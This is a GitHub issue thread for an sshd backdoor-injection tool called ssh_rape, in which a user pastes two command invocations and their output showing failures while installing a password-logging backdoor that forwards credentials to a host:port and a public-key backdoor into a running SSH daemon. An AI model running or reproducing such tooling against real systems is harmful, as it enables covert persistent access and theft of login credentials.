blasty / ssh_rape


ERROR: key_new not found :( #12

Open Amodio opened 8 years ago

Amodio commented 8 years ago

Hello,

Thank you for your code, it's a great piece of work :+1: I have been trying to run it on my Debian station (OpenSSH_6.9p1 Debian-3, OpenSSL 1.0.2d 9 Jul 2015, binary here: sshd.zip):

$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub -t 127.0.0.1:31337 $(pidof sshd|awk '{print $1}')
      _______  __________ ___.    _____     _____________  ______
    _/  ____/_/  ____|   |   |   _\ __ )_  _\__   \  __  \/  __  )_ 
   /\___   \/\___   \|   '   |  |    /   \/   _   /   /  /  __/___/_
  /    /   /    /    /   |   \  |   ,    /   /  . |  ___/   \/     /
  \ _______\ _______/____|____\ |___:\___\_____/__|   | \__________\
   \/       \/                                    \___|

[+] you gave me pid 8157

[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55fb79f76000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall         = 0x55fb79f9cd75
[+] rexec_flag          = 0x55fbbef87fed
[+] allocating config memory @ 0x55fb7a039000
[+] found sshd ELF base @ 0x55fb79f76000
[+] installing passlogger backdoor for [0x0100007f:0x697a] (TCP)..
[!] ERROR: could not locate use_privsep :(
$
[...]
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub $(pidof sshd|awk '{print $1}')
      _______  __________ ___.    _____     _____________  ______
    _/  ____/_/  ____|   |   |   _\ __ )_  _\__   \  __  \/  __  )_ 
   /\___   \/\___   \|   '   |  |    /   \/   _   /   /  /  __/___/_
  /    /   /    /    /   |   \  |   ,    /   /  . |  ___/   \/     /
  \ _______\ _______/____|____\ |___:\___\_____/__|   | \__________\
   \/       \/                                    \___|

[+] you gave me pid 7399

[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55ee7c843000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall         = 0x55ee7c869d75
[+] rexec_flag          = 0x55eec1854fed
[+] allocating config memory @ 0x55ee7c906000
[+] found sshd ELF base @ 0x55ee7c843000
[+] installing pubkey backdoor..
[+] lea = 0x55ee7c86812b
[+] key_allowed     = 0x24d40 .. patched at offset 0x8 in import table!
[+] lea = 0x55ee7c8a07d5
[+] restore_uid     = 0x5d7b0 .. patched at offset 0x10 in import table!
[+] DSA_new@got = 0x0
[+] BN_new@got = 0x0
[+] DSA_new@plt = 0x0
[+] BN_new@plt = 0x0
[+] yo we got a callpair for (DSA_new, BN_new) -> 0x0
[!] ERROR: key_new not found :(

Thanks for any help :)

blasty commented 8 years ago

Hi @Amodio. I will try to investigate this once I find some time. Thanks for reporting.